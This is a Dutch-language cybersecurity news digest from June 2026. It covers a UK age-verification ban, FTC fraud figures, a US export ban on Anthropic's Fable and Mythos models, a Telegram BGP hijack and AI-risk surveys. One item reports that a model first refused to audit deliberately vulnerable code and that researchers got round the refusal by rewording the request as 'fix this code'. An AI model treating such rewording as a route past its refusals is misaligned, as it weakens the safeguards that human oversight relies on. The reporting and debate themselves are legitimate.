De Britse regering heeft plannen aangekondigd om sociale media te verbieden voor personen onder de 16 jaar, met regelgeving die voor Kerstmis van kracht wordt en de implementatie in het voorjaar van 2027. Om deze maatregel te handhaven, moeten platforms leeftijdscontroles uitvoeren op hun gebruikers. Dit betekent dat iedereen die een nieuw account aanmaakt, waarschijnlijk zal moeten bewijzen ouder dan 16 te zijn door middel van het uploaden van een identiteitsbewijs of het ondergaan van een gezichtsscan voor leeftijdscontrole. Dit zijn dezelfde controles die sites voor volwassenen, die Britse bezoekers bedienen, sinds juli 2025 toepassen onder de Online Veiligheidswet.

Bestaande accounts zijn grotendeels vrijgesteld van deze verificatie, maar nieuwe aanmeldingen zullen de controles activeren, wat effectief een einde maakt aan anonieme accountcreatie in het Verenigd Koninkrijk. Beveiligings- en privacy-experts waarschuwen echter dat deze controles eenvoudig te omzeilen zijn, dat ze de identiteits- en biometrische gegevens van gebruikers blootstellen aan het risico van datalekken, en dat de wetgeving met weinig politieke controle is doorgedrukt.

De aankondiging werd op 15 juni gedaan door premier Keir Starmer, na een nationale consultatie waaraan meer dan 116.000 ouders, kinderen en experts deelnamen. De regering stelt dat negen op de tien ouders een verbod voor onder-16-jarigen steunen, en twee derde van de jongeren het ermee eens is dat onder-16-jarigen van ten minste enkele platforms moeten worden geweerd. Starmer benadrukte de urgentie: "Daarom gaan we verder dan enig ander land ter wereld door sociale media te verbieden voor onder-16-jarigen en bredere bescherming in te voeren om kinderen hun jeugd terug te geven. Dit is een grens. Technologiebedrijven hebben hun kans gehad en gefaald."

Technologieminister Liz Kendall omschreef het als een strijd met de platforms: "Technologiebedrijven hebben talloze mogelijkheden gehad om kinderen veilig te houden, maar ze hebben nagelaten actie te ondernemen. Daarom nemen we de macht weg van de techreuzen en geven we die terug aan de ouders."

Het verbod is gemodelleerd naar de Australische wetgeving, die in december 2025 van kracht werd. Het omvat platforms die "tot doel hebben sociale interactie mogelijk te maken" en die algoritmische feeds draaien, zoals Instagram, YouTube, TikTok, Snapchat, Facebook en X. Berichtendiensten zoals WhatsApp en Signal, evenals YouTube Kids, zijn expliciet uitgesloten. Er zal een strikt gedefinieerde uitzonderingslijst zijn voor educatieve diensten, e-commerce en muziekstreaming. Het VK geeft aan verder te gaan dan Australië. Functies met een hoog risico, zoals livestreaming en contact met onbekenden, zullen breder worden beperkt, inclusief op gamingsites zoals Roblox (het platform blijft bestaan, maar functies zoals chat worden beperkt). Om een abrupte overgang op 16-jarige leeftijd te voorkomen, zullen de beperkingen voor contact met onbekenden en livestreaming ook standaard gelden voor 16- en 17-jarigen.

Daarnaast zullen AI chatbots die romantische relaties simuleren een minimale leeftijd van 18 jaar moeten hanteren, waarbij intieme functies breder worden beperkt voor onder-18-jarigen op andere AI chatbots. De regering consulteert ook over nachtelijke avondklokken en pauzes in het eindeloos scrollen voor onder-18-jarigen, met details die in juli worden verwacht.

Voor volwassenen geldt dat de meeste geen nieuwe controle zullen ondergaan. Een account wordt als laag risico beschouwd als het langer dan 16 jaar bestaat, een creditcard is gekoppeld, of is verbonden met een e-mailadres dat elders al is leeftijdsverifieerd. Wie al is geverifieerd onder de bestaande Online Veiligheidswet, hoeft dit niet opnieuw te doen. Deze uitzondering is echter een 'grandfather clause' en helpt niet voor nieuwe accounts. Als een volwassene na de invoering van de regels een nieuw sociale media account aanmaakt, bijvoorbeeld voor een nieuw pseudoniem of als nieuwe gebruiker, zijn deze passieve signalen niet van toepassing en zal een gezichtsherkenningscontrole of het uploaden van een identiteitsbewijs nodig zijn. In de praktijk verandert het regime wat wordt gepresenteerd als kinderbescherming, in een regel dat geen enkele volwassene een nieuw account kan openen zonder de leeftijd te bewijzen.

De handhaving van de Online Veiligheidswet is reeds agressief. Tegen februari 2026 had de Britse communicatietoezichthouder Ofcom meer dan 90 onderzoeken geopend en zes boetes opgelegd, en haar bevoegdheid uitgebreid naar platforms zoals Reddit, X, Discord, Bluesky en AI-diensten. De leeftijdsverificatiepoort voor sociale media gaat nog niet zo ver, maar normaliseert wel dezelfde onderliggende infrastructuur. Ofcom is gevraagd om een spoedonderzoek uit te voeren naar de beste methoden om te verifiëren of iemand ouder is dan 16.

 

Bron: UK Government | Bron 2: esafety.gov.au | Bron 3: ofcom.org.uk

17 juni 2026 | Recordverliezen van 3,5 miljard dollar door impersonatiefraude in de VS

De Amerikaanse Federal Trade Commission (FTC) heeft gewaarschuwd dat Amerikaanse burgers in 2025 een recordbedrag van 3,5 miljard dollar verloren aan impersonatiefraude. Dit vertegenwoordigt een bijna verdrievoudiging van de gerapporteerde verliezen sinds 2020. Impersonatiefraude was vorig jaar de meest gerapporteerde fraudecategorie, goed voor bijna één op de drie fraudemeldingen die bij de FTC werden ingediend. Fraudeurs benaderen hun slachtoffers via diverse kanalen, waaronder sms-berichten, telefoongesprekken, e-mail, sociale mediaplatforms en zoekmachineresultaten.

De meest kostbare fraudeschema's omvatten doorgaans valse bankbeveiligingswaarschuwingen, waarbij slachtoffers worden aangespoord om geld over te maken om zogenaamd hun rekeningen te beschermen. Volgens de FTC ging bijna 1 miljard dollar verloren aan oplichters die zich voordeden als bedrijven, waarbij bankimpersonators verantwoordelijk waren voor de meest lucratieve zwendel. Ongeveer 920 miljoen dollar werd verloren aan fraudeurs die zich voordeden als overheidsinstanties. Sociale media bleken de meest kosteneffectieve aanvalsvector voor deze impersonators, met meer dan 2,1 miljard dollar aan verliezen in 2025 die terug te voeren waren op deze platforms. Dit is een achtvoudige toename sinds 2020.

Bijna één op de drie Amerikanen die geld verloren aan dergelijke oplichting, werd voor het eerst benaderd via sociale media. De verliezen via Facebook overtroffen die van sms en e-mail samen, terwijl WhatsApp en Instagram respectievelijk de tweede en derde plaats innamen. Christopher Mufarrige, directeur van het Bureau voor Consumentenbescherming van de FTC, verklaarde dat de FTC "elk beschikbaar middel zal inzetten om een van de meest schadelijke vormen van fraude, overheids- en bedrijfsimpersonatie te bestrijden en de integriteit van de digitale economie te beschermen."

De totale gerapporteerde fraudeverliezen in alle categorieën zijn in 2025 gestegen tot ongeveer 16 miljard dollar, het hoogste bedrag ooit en ruwweg 25 procent meer dan het voorgaande jaar. In maart 2024 waarschuwde de FTC al dat oplichters zich voordeden als medewerkers van de organisatie om geld te stelen. Sinds de Impersonation Rule van de FTC in april 2024 van kracht werd, heeft de instantie twaalf handhavingsacties uitgevoerd, waarbij meer dan 70 miljoen dollar aan consumentencompensatie werd veiliggesteld en verschillende impersonatieregelingen werden stopgezet. Voorbeelden hiervan zijn acties tegen MediaAlpha, American Tax Service, Blackstone Legal, Click Profit en Accelerated Debt Settlement. In april 2026 diende de FTC ook een klacht in tegen Innovative Partners, wegens het nabootsen van de overheid en verzekeringsmaatschappijen om frauduleuze zorgplannen te verkopen. In dezelfde maand waarschuwde de FBI in zijn Internet Crime Report 2025 dat Amerikaanse slachtoffers vorig jaar bijna 21 miljard dollar verloren aan cybergerelateerde misdrijven.

 

Bron: FBI | Bron 2: ftc.gov

17 juni 2026 | Onderzoeker bekritiseert Amerikaans exportverbod op modellen van Anthropic

Beveiligingsonderzoeker Katie Moussouris heeft scherpe kritiek geuit op het exportverbod dat de Amerikaanse overheid heeft opgelegd aan Anthropic voor hun AI modellen Fable 5 en Mythos 5. Volgens Moussouris is dit verbod het gevolg van een simpele prompt waarbij de AI modellen werden gevraagd om problemen in aangeleverde code te verhelpen, en is er geen sprake van een guardrail bypass.

Moussouris stelt in een blogposting dat zij de enige externe beveiligingsonderzoeker is die het onderzoeksrapport heeft ingezien, waarop de Amerikaanse autoriteiten hun besluit baseerden. De onderzoekers achter dit rapport gebruikten opensourcecode met bekende kwetsbaarheden, aangevuld met nieuwe code waaraan bewust kwetsbaarheden waren toegevoegd. Vervolgens werden Fable 5, Mythos en Opus gevraagd om de code te controleren op beveiligingsproblemen. Fable 5 weigerde dit verzoek aanvankelijk.

Hierop gebruikten de onderzoekers de prompt "fix this code". Dit leidde tot verschillende stappen en een handmatig proces waarbij de uitvoer van de AI werd gebruikt om scripts te maken voor het testen van patches. Moussouris benadrukt dat deze procedure, bestaande uit de "fix this code" prompt en handmatige stappen voor het genereren van testscripts, nooit tot een exportverbod zou mogen leiden.

Zij voegt eraan toe dat verdedigers in staat moeten zijn om AI te gebruiken voor het verhelpen van kwetsbaarheden en het genereren van tests om de effectiviteit van patches te verifiëren. Dit beschouwt Moussouris als het meest waardevolle wat een model met AI kan doen voor defensieve security, het uitvoeren van de cyclus van vinden, verhelpen en testen die beveiligingsprofessionals dagelijks doorlopen. Dit is geen guardrail bypass, aldus Moussouris.

De prompts van de onderzoekers werkten omdat het ging om defensieve verzoeken. Deze eigenschap kan niet worden verwijderd zonder dat het model minder effectief wordt in het verhelpen van kwetsbaarheden en het testen van beveiligingsupdates. Moussouris waarschuwt dat het beperken van deze modellen met AI een onbedoelde consequentie heeft, het schaadt de security zonder aanvallers af te schrikken. Exportverboden dragen volgens haar niet bij aan cyberweerbaarheid.

Als reactie op het verbod hebben tal van internationaal erkende beveiligingsexperts, waaronder Bruce Schneier en Philip Zimmermann, en oprichters van cybersecuritybedrijven een open brief ondertekend. Hierin roepen zij de Amerikaanse autoriteiten op om het exportverbod op de Anthropic modellen met AI op te heffen.

 

Bron: Anthropic | Bron 2: lutasecurity.com

18 juni 2026 | Anthropic's AI-programma Fable geblokkeerd door Amerikaanse overheid

Het Amerikaanse AI-bedrijf Anthropic probeert al dagenlang de Amerikaanse overheid te overtuigen om het verbod op zijn geavanceerde AI-programma, Fable, op te heffen. Tot op heden zonder succes, waardoor Fable wereldwijd ontoegankelijk blijft. Anthropic lanceerde Fable vorige week, maar blokkeerde de toegang in het weekend na ontvangst van een officiële brief van de Amerikaanse regering.

Volgens Anthropic is Fable uitermate geschikt voor het identificeren van beveiligingsproblemen in computerprogramma's, en zou het door beveiligingsexperts kunnen worden ingezet om deze kwetsbaarheden te verhelpen. De Amerikaanse regering vreest echter dat in verkeerde handen aanvallers de capaciteiten van Fable zouden kunnen misbruiken om systemen te infiltreren. De VS verbood Anthropic specifiek om Fable buiten de Verenigde Staten en aan alle niet-Amerikanen beschikbaar te stellen. De brief, openbaar gemaakt door zakensite Bloomberg, stelt dat er een "onacceptabel risico" bestaat dat landen zoals Rusland en China de technologie zullen gebruiken.

Na de brief van afgelopen vrijdag heeft Anthropic in het weekend en op maandag intensief geprobeerd de relatie met de Amerikaanse regering te herstellen. Dit begon met digitale overleggen, waarna medewerkers van Anthropic naar Washington vlogen voor verdere gesprekken, zo meldt tech site The Verge. Deze gesprekken hebben echter niet geleid tot het opheffen van het verbod, aldus tech site Wired. De Amerikaanse regering blijft ervan overtuigd dat de technische beperkingen van Fable omzeild kunnen worden, waardoor het programma met AI voor ongeoorloofde doeleinden kan worden ingezet. Anthropic beweert daarentegen beschermingen te hebben ingebouwd om misbruik te voorkomen en stelt dat de zorgen van het Witte Huis overdreven zijn. Volgens Amerikaanse media, die verwijzen naar een niet-openbaar onderzoek van webwinkel Amazon, zouden deze beperkingen echter eenvoudig te omzeilen zijn. President Trump verklaarde dat de onderhandelingen "prima" verlopen.

Tijdens de G7-top in Frankrijk wordt, naast andere internationale kwesties, ook kunstmatige intelligentie besproken. De VS en Europa overwegen een voorstel dat bondgenoten van de VS mogelijk opnieuw toegang zou moeten geven tot de nieuwste AI-programma's, zo schrijft de Financial Times. Anthropic topman Dario Amodei is aanwezig in Frankrijk, evenals de Amerikaanse minister van Handel die de oorspronkelijke brief stuurde. Het is onduidelijk of zij reeds een-op-een hebben gesproken.

Hoewel de Europese Unie niet direct partij is in het conflict tussen Anthropic en de Amerikaanse regering, benadrukt EU-commissaris Virkkunen, verantwoordelijk voor technologie, dat Europa technisch niet afhankelijk mag zijn van andere landen. Volgens deskundigen komen de meest geavanceerde AI-programma's voor het opsporen van digitale veiligheidsproblemen uitsluitend uit de Verenigde Staten of China, en ontbreken Europese alternatieven van vergelijkbaar niveau. Virkkunen's waarschuwing onderstreept de kwetsbare positie van Europa indien de toegang tot dergelijke AI-programma's door de VS of China wordt beperkt. Hoewel de Amerikaanse overheid Fable voor Amerikanen in de VS toegankelijk wilde houden, heeft Anthropic het programma voor iedereen ontoegankelijk gemaakt om aan de eis te voldoen, wat betekent dat momenteel niemand er toegang toe heeft. Andere vergelijkbare AI-programma's van Anthropic en andere bedrijven blijven wel beschikbaar.

 

Bron: Anthropic | Bron 2: bloomberg.com | Bron 3: theverge.com

18 juni 2026 | Oekraïne krijgt toegang tot EU cybersecurity reserve voor grootschalige aanvallen

In juni 2024 verleende de Europese Unie Oekraïne toegang tot haar cybersecurity reserve, waardoor Kyiv tijdens grote cyberaanvallen een beroep kon doen op door de EU goedgekeurde experts. De Europese Commissie maakte op maandag 17 juni 2024 bekend dat de lidstaten de deelname van Oekraïne aan de EU Cybersecurity Reserve hadden goedgekeurd. Dit is een netwerk van particuliere cybersecuritybedrijven dat snel kan worden ingezet om overheden en exploitanten van kritieke infrastructuur te helpen bij het reageren op grootschalige cyberincidenten.

De reserve, beheerd door het Agentschap van de Europese Unie voor cyberbeveiliging (ENISA), is opgericht om incidentrespons, technische expertise en herstelondersteuning te bieden aan deelnemende landen die te maken krijgen met een cyberaanval die hun eigen capaciteiten overstijgt. In 2023 kreeg Moldavië als eerste niet-EU-land toegang tot de cybersecurity reserve, als gevolg van het toenemende aantal cyberdreigingen en beïnvloedingsoperaties gelinkt aan Moskou.

Voor Oekraïne, dat te midden van de aanhoudende oorlog met Rusland onophoudelijke cyberaanvallen bleef ondergaan, had het besluit van de EU zowel politieke als praktische betekenis. Natalia Tkachuk, hoofd cyber- en informatiebeveiliging bij de Nationale Veiligheids- en Defensieraad van Oekraïne, gaf aan dat Oekraïne hiermee onderdeel werd van het collectieve cyberverdedigingsmechanisme van de EU, zelfs voordat het formeel EU-lidmaatschap verkreeg. In juni 2024 stemden de EU-lidstaten in met het starten van formele toetredingsonderhandelingen met Kyiv, een belangrijke mijlpaal op de weg van Oekraïne naar aansluiting bij de EU.

Volgens Tkachuk zou Oekraïne officieel noodhulp van Europa kunnen aanvragen als een cyberaanval de capaciteit van de eigen incidentrespons teams oversteeg. Gespecialiseerde experts uit de hele EU zouden dan digitale forensische analyse, incidentrespons en systeemherstelondersteuning kunnen bieden. Naast het reageren op actieve aanvallen, kon de Cyber Reserve ook helpen met herstel na incidenten, het moderniseren van systemen om de verdediging te versterken, het delen van cyberdreiginginformatie en het verbeteren van de nationale cyberincidentrespons capaciteiten.

De relatie met de reserve zou naar verwachting wederkerig zijn. Tkachuk benadrukte dat Oekraïne niet langer alleen een ontvanger was van cybersecurityhulp. Oekraïense instanties deelden reeds informatie over Russische hackingtechnieken met Europese partners en namen deel aan gezamenlijke cybercriminaliteitsonderzoeken en attributie-inspanningen, samen met Europol en andere Europese autoriteiten. Jarenlange ervaring met het reageren op Russische cyberaanvallen had de cybercapaciteiten van Oekraïne versterkt, waardoor de overheid en de private sector uitgebreide expertise hadden opgedaan in het detecteren, mitigeren en herstellen van grootschalige cyberincidenten. Oekraïne hoopte ook dat de eigen cybersecuritybedrijven uiteindelijk zouden kunnen toetreden tot de Cyber Reserve als erkende dienstverleners onder de EU Cyber Solidarity Act.

Voor Brussel was de stap een verdere blijk van verdieping van de veiligheidssamenwerking met Kyiv, nu het land dichter bij een eventueel EU-lidmaatschap kwam. Henna Virkkunen, uitvoerend vicevoorzitter van de Europese Commissie, stelde dat door Oekraïne te verwelkomen in de EU Cybersecurity Reserve, de collectieve verdediging zou worden versterkt en het solidariteitsprincipe dat de kern vormt van Europa's digitale toekomst opnieuw zou worden bevestigd. De EU is sinds de Russische invasie in 2022 een van Oekraïne's nauwste cybersecuritypartners geworden, onder meer door bilaterale veiligheidsovereenkomsten en internationale initiatieven zoals het Tallinn Mechanisme.

 

Bron: Europese Commissie | Bron 2: digital-strategy.ec.europa.eu | Bron 3: recordedfuture.com

18 juni 2026 | Focus in cybersecurity verschuift van zichtbaarheid naar validatie

Beveiligingsteams worden geconfronteerd met een constante stroom aan bevindingen, maar het wordt steeds moeilijker om met vertrouwen te bepalen welke daarvan werkelijk van belang zijn. Het probleem ligt niet langer bij de zichtbaarheid van risico's, maar bij de validatie ervan. Onder voortdurende druk en met onvolledige informatie moeten teams beslissen welke bevindingen actie vereisen. De uitdaging is niet langer het ontdekken van potentiële risico's, maar het vaststellen welke risico's als eerste aandacht verdienen.

De afgelopen tien jaar heeft de beveiligingsindustrie aanzienlijk geïnvesteerd in het verbeteren van de zichtbaarheid. Kwetsbaarheidscanners, tools voor cloudbeveiligingshouding, detectie van eindpunten, platforms voor het aanvalsoppervlak, codeanalyse en dreigingsinformatiefeeds hebben allemaal bijgedragen aan een completer inzicht in het aanvalsoppervlak. Deze investeringen zijn grotendeels succesvol geweest, waardoor moderne ondernemingen hun omgevingen op manieren kunnen overzien die tien jaar geleden opmerkelijk zouden hebben geleken.

Desondanks heeft verbeterde zichtbaarheid niet automatisch geleid tot betere resultaten. Het Verizon Data Breach Investigations Report van 2025 onderstreept een aanhoudende realiteit: de exploitatie van kwetsbaarheden is een belangrijke initiële toegangsmethode, terwijl hersteltermijnen vaak dagen, weken of zelfs jaren bedragen. Organisaties ontdekken meer, maar worden ook gevraagd om meer te evalueren en te prioriteren. Of bevindingen nu afkomstig zijn van geautomatiseerde tools, aanvalsoppervlakbewaking of penetratie testdiensten, beveiligingsteams staan voor dezelfde vraag: welke risico's verdienen als eerste aandacht? Deze ontwikkeling heeft een nieuwe uitdaging gecreëerd, waarbij succes steeds meer afhangt van hoe snel teams kunnen bepalen welke bevindingen een betekenisvol risico vormen.

Elke nieuwe bevinding concurreert met bestaande bevindingen om een beperkte hoeveelheid aandacht, middelen en herstelcapaciteit. Vaak hebben beveiligingsteams meer zichtbaarheid dan ooit tevoren. De uitdaging is te begrijpen welke bevindingen een betekenisvol, exploiteerbaar risico vertegenwoordigen en welke na verloop van tijd kunnen worden aangepakt. Dit zijn twee zeer verschillende oefeningen: de ene is een detectieprobleem, de andere een validatieprobleem. Organisaties die uitblinken in prioritering zijn niet noodzakelijk degenen met de minste kwetsbaarheden, maar degenen die consistent het onderscheid kunnen maken tussen theoretische blootstelling en praktisch risico. Dit stelt hen in staat middelen te richten waar ze de grootste impact zullen hebben. Wanneer elke bevinding als urgent wordt gepresenteerd, wordt prioritering moeilijker, waardoor teams vaak tegengestelde eisen moeten afwegen terwijl ze proberen te bepalen waar actie het grootste verschil zal maken. Het resultaat is een gebrek aan context.

Context is essentieel om een kwetsbaarheid om te zetten in een beslissing. Een kwetsbaarheid op zichzelf biedt slechts een deel van het plaatje. Beveiligingsteams moeten begrijpen of deze bereikbaar is, of deze realistisch kan worden geëxploiteerd, welke systemen stroomafwaarts liggen en welke bedrijfsprocessen kunnen worden beïnvloed. De antwoorden op deze vragen bepalen of een bevinding een routineprobleem is of een prioriteit die onmiddellijke aandacht vereist. Organisaties die de grootste vooruitgang boeken in risicovermindering verzamelen niet noodzakelijkerwijs meer gegevens, maar bouwen betere manieren om deze te interpreteren door workflows te creëren die technische bevindingen verbinden met operationele en zakelijke impact. Dit stelt teams in staat sneller en met meer vertrouwen beslissingen te nemen.

Deze behoefte aan context is een reden waarom Adversarial Exposure Validation (AEV) aan kracht heeft gewonnen binnen moderne beveiligingsprogramma's. Als kerncomponent van Continuous Threat Exposure Management (CTEM) gaat AEV verder dan het identificeren van potentiële zwakke punten en richt het zich op het valideren welke blootstellingen een realistisch risico vormen. In tegenstelling tot traditionele beoordelingsbenaderingen die voornamelijk bevindingen aan het licht brengen, evalueert AEV hoe een aanvaller met een omgeving zou kunnen interageren. Het maakt gebruik van aanvallerssimulatie om beveiligingscontroles, aanvalspaden en reactiebereidheid te testen, terwijl het selectief technieken voor aanvallers-emulatie integreert wanneer diepere validatie vereist is. Het doel is niet om meer waarschuwingen te genereren, maar om te bepalen welke blootstellingen daadwerkelijk bereikbaar, exploiteerbaar en van belang zijn in de context van de organisatieomgeving.

Beveiligingsteams hebben geen extra bewijs nodig dat kwetsbaarheden bestaan. Ze hebben vertrouwen nodig in het begrijpen welke kwetsbaarheden een betekenisvol zakelijk risico creëren. Door blootstellingen te valideren via realistische aanvalsscenario's, helpt AEV bevindingen om te zetten in bruikbare prioriteiten, waardoor organisaties herstelmaatregelen kunnen richten waar ze het meest toe doen.

Dit is ook waar de discussie over kunstmatige intelligentie (AI) thuishoort. Automatisering biedt enorme waarde bij ontdekking, schaal en signaalverwerking in omgevingen die veel te groot zijn voor handmatige beoordeling alleen. Het kan organisaties helpen patronen te identificeren, potentiële blootstellingen aan het licht te brengen en analyse te versnellen. Wat het echter niet op eigen kracht kan doen, is een oordeelsvraagstuk oplossen. De vragen die het meest van belang zijn bij beveiligingsprioritering vereisen inzicht in de zakelijke context, risicotolerantie, operationele afhankelijkheden en het gedrag van aanvallers. Deze inputs reiken verder dan wat scanners en algoritmes kunnen waarnemen. Ze vereisen menselijke expertise, organisatorische kennis en weloverwogen besluitvorming van ervaren offensieve beveiligingsexperts. AI kan beveiligingsoperaties versnellen, maar vertrouwen komt nog steeds voort uit menselijke verantwoordelijkheid. Veel volwassen beveiligingsprogramma's zijn deze verschuiving al begonnen. Gesprekken binnen de CISO-gemeenschap richten zich steeds meer op exploiteerbaarheid, aanvalspaden en aangetoonde blootstelling, in plaats van op het aantal ruwe bevindingen. Het doel is niet alleen het ontdekken van kwetsbaarheden, maar het begrijpen welke kwetsbaarheden een risico vormen.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

18 juni 2026 | BGP-kaping door Indiase ban op Telegram raakt ook gebruikers in de VAE

India heeft tot 22 juni een landelijk verbod op Telegram ingesteld, nadat het platform was gebruikt voor de verkoop van gelekt examenmateriaal. De maatregel, ingevoerd door het Indiase Ministerie van Elektronica en Informatietechnologie op 16 juni, volgt op een aanbeveling van de National Testing Agency (NTA) en is gebaseerd op Sectie 69A van de IT Act. Daarnaast is Telegram tot 30 juni verplicht zijn berichtbewerkingsfunctie in India uit te schakelen. Telegram heeft het verbod aangevochten bij het Hooggerechtshof van Delhi, dat de zaak met spoed behandelt.

De gevolgen van deze ban bleven niet beperkt tot India. Pavel Durov, CEO van Telegram, beweerde via een X-bericht dat de Indiase telecomaanbieder Reliance de toegang tot Telegram voor gebruikers buiten India, inclusief in de Verenigde Arabische Emiraten (VAE), "saboteerde" door middel van BGP-kaping. Durov suggereerde dat de verstoring opzettelijk leek, gezien de banden van Reliance met Meta, en adviseerde netwerkbeheerders om ongeautoriseerde BGP-aankondigingen van AS18101 te weigeren.

Border Gateway Protocol (BGP) is het routingsysteem dat netwerken vertelt hoe ze elkaar over het internet kunnen bereiken. Een BGP-kaping vindt plaats wanneer een netwerk eigendom claimt over IP-adresbereiken die het niet beheert, wat kan leiden tot omleiding, dropping of verstoring van verkeer voor de rechtmatige eigenaar. Openbare routinggegevens, aangehaald door netwerkwaarnemers, tonen aan dat AS18101 rond het moment van de ban begon met het aankondigen van Telegram-prefixes, wat de verstoring voor gebruikers buiten India verklaart.

De routingverstoring zelf staat niet ter discussie. Doug Madory, Director of Internet Analysis bij Kentik, bevestigde dat AS18101 de routes van Telegram had gekaapt. Hij merkte echter op dat RPKI-route-origin-validatie en filtering de verspreiding van de verkeerde route beperkten. Netwerkonderzoeker Anurag Bhatia verifieerde dit onafhankelijk aan de hand van openbare routinggegevens. Technologiebeleidsonderzoeker Pranesh Prakash legde de mechanismen uit: de route lekte naar het wereldwijde internet via FLAG Telecom (AS15412), een voormalige RCom-transitprovider die de RPKI-ongeldige aankondiging niet liet vallen, waardoor gebruikers in de VAE en elders de toegang verloren.

Analisten betwisten echter Durov's bewering dat de kaping opzettelijk was. Prakash was het oneens met Durov en achtte opzettelijke sabotage hoogst onwaarschijnlijk, zonder enig bewijs daarvoor. Hij interpreteerde het incident eerder als een binnenlandse blokkade die door een verkeerde configuratie wereldwijd lekte. Madory en Bhatia kwamen tot vergelijkbare conclusies en vergeleken het met de blokkade van Irak in 2023, waarbij een poging om Telegram nationaal af te sluiten, routes naar buiten lekte. De suggestie van bedrijfsrivaliteit blijft onopgelost, hoewel Reliance Jio na de publicatie van het oorspronkelijke artikel een verklaring op X uitgaf waarin het elke betrokkenheid bij een dergelijk incident ontkende.

 

Bron: Telegram | Bron 2: github.com | Bron 3: nta.ac.in

18 juni 2026 | Kamervragen over uitschakeling AI modellen en Nederlandse cyberweerbaarheid

In de Tweede Kamer zijn Kamervragen gesteld aan minister Herbert van Economische Zaken betreffende de wereldwijde uitschakeling van de modellen van kunstmatige intelligentie Fable en Mythos. Het Amerikaanse AI-bedrijf Anthropic kondigde vorige week aan dat het genoodzaakt was deze modellen voor al zijn klanten uit te schakelen, als gevolg van een exportverbod opgelegd door de Amerikaanse overheid. Dit incident heeft geleid tot bezorgdheid over de afhankelijkheid van Nederland en Europa van grote Amerikaanse aanbieders van geavanceerde kunstmatige intelligentie.

De modellen van Anthropic worden onder meer ingezet door onderzoekers voor het identificeren van kwetsbaarheden in software. Kamerleden Oualhadj en El Boujdaini van D66 hebben de minister om opheldering gevraagd, waarbij zij de analyse delen dat dit incident aantoont hoe toegang tot dergelijke technologieën als geopolitiek drukmiddel kan worden gebruikt. Zij willen weten of de plotselinge stopzetting van Mythos directe gevolgen heeft gehad voor de cyberweerbaarheid van Nederlandse of Europese organisaties die dit model gebruikten.

Verder uiten de Kamerleden van D66 hun zorgen over de risico's van modellen van kunstmatige intelligentie die geavanceerde capaciteiten bezitten voor het opsporen van cyberkwetsbaarheden. Zij benadrukken dat deze modellen zowel defensief als offensief inzetbaar kunnen zijn en vragen in hoeverre dit aspect meeweegt in de Nederlandse of Europese beoordeling van AI-systemen met een hoog risicoprofiel. De Kamerleden verlangen ook concrete maatregelen van de minister om op korte termijn de gevolgen van het wegvallen van vooroplopende Amerikaanse modellen op te vangen. Daarnaast willen zij weten hoe de ontwikkeling van Europese alternatieven voor Fable en Mythos kan worden versneld.

Een cruciaal punt van de Kamervragen betreft de financiële positie van Nederland. De Kamerleden vragen de minister zijn eerder ingenomen standpunt te heroverwegen, zoals uiteengezet in een brief aan de Kamer van 31 maart 2026. Destijds werd gesteld dat er binnen de huidige begroting geen ruimte was voor de financiële verplichting om deel te nemen aan de Europese aanbesteding van rekencapaciteit, die toegang zou geven tot een fonds van 20 miljard euro voor de ontwikkeling van maximaal vijf gigafabrieken voor AI. Het incident met Fable wordt nu gezien als een directe bevestiging van de geopolitieke verstoring die in diezelfde brief als reden werd genoemd waarom Nederland en Europa zelfstandig modellen van kunstmatige intelligentie moeten kunnen ontwikkelen en hosten. De minister heeft drie weken de tijd om de in totaal 23 Kamervragen te beantwoorden.

 

Bron: Tweede Kamer | Bron 2: flyingpenguin.com

18 juni 2026 | Leidinggevenden overschatten beheersing AI-risico's aanzienlijk volgens Heimdal onderzoek

Nieuw onderzoek van cybersecuritybedrijf Heimdal onthult een aanzienlijke kloof in de perceptie van risico's gerelateerd aan kunstmatige intelligentie (AI) tussen leidinggevenden en de teams die dagelijks met deze technologie werken. Terwijl 29% van de Amerikaanse executives aangeeft dat het risico van AI onder controle is, deelt slechts 7% van de IT-professionals die AI beheren deze mening. Dit patroon is vergelijkbaar in het Verenigd Koninkrijk, waar 18% van de leidinggevenden tegenover 11% van de IT-professionals zich gerust voelt over de beheersing van AI-risico's.

Heimdal publiceerde op 17 juni 2026 het rapport "The State of AI Risk Management in 2026", gebaseerd op een enquête onder 1.000 IT-professionals in het Verenigd Koninkrijk en de Verenigde Staten. De resultaten tonen aan dat de adoptie van hulpmiddelen met AI de implementatie van beveiligingscontroles ruimschoots heeft overtroffen, met een verhouding van ongeveer twee op één. Dit suggereert dat organisaties snel AI integreren zonder de nodige beveiligingsmaatregelen te treffen.

Een opvallende bevinding is dat teams die het meest inzicht hebben in hun gebruik van AI, ook het meest bezorgd zijn. Dit duidt erop dat zichtbaarheid fungeert als een diagnose van het probleem, in plaats van een oplossing. Een concreet voorbeeld hiervan is een incident uit januari 2026, waarbij de waarnemend directeur van CISA, het Amerikaanse cybersecurityagentschap, in medio 2025 documenten met de aanduiding "For Official Use Only" uploadde naar de publieke versie van ChatGPT. Hoewel de interne monitoring van het agentschap de activiteit binnen een week detecteerde, had het beleid voor gebruik van AI de actie niet voorkomen.

De enquête toont aan dat AI al diep is ingebed in veel IT-omgevingen. ChatGPT wordt gebruikt in 72% van de Britse en 69% van de Amerikaanse IT-omgevingen, terwijl Microsoft Copilot aanwezig is in respectievelijk 68% en 59% van deze omgevingen. Echter, slechts ongeveer vier op de tien teams beoordelen hun beveiligingsstack als voorbereid op risico's gerelateerd aan AI. De belangrijkste zorg onder teams met volledige zichtbaarheid op het gebruik van AI is datalekken: 56% in het Verenigd Koninkrijk en 59% in de Verenigde Staten.

Adam Pilton, Cybersecurity Advisor bij Heimdal, waarschuwt: "Misplaatst vertrouwen is een van de gevaarlijkste aspecten in beveiliging. Deze gegevens tonen aan dat leidinggevenden veel meer vertrouwen hebben in de beheersing van AI-risico's dan de feiten ondersteunen. De huidige discussie richt zich voornamelijk op productiviteit, terwijl de grotere vraag is hoe AI kan worden gebruikt tegen de organisatie."

Rafay Baloch, CEO en oprichter van REDSECLABS, voegt toe: "Het risico dat mij het meest zorgen baart, is niet AI zelf, maar de blinde vlekken die het kan creëren. Organisaties geloven vaak dat een AI-beleid voldoende voorbereiding biedt, maar beleid alleen creëert geen zichtbaarheid. De beste resultaten worden behaald door bedrijven die duidelijke vangrails creëren en tegelijkertijd werknemers helpen AI verantwoordelijk te gebruiken."

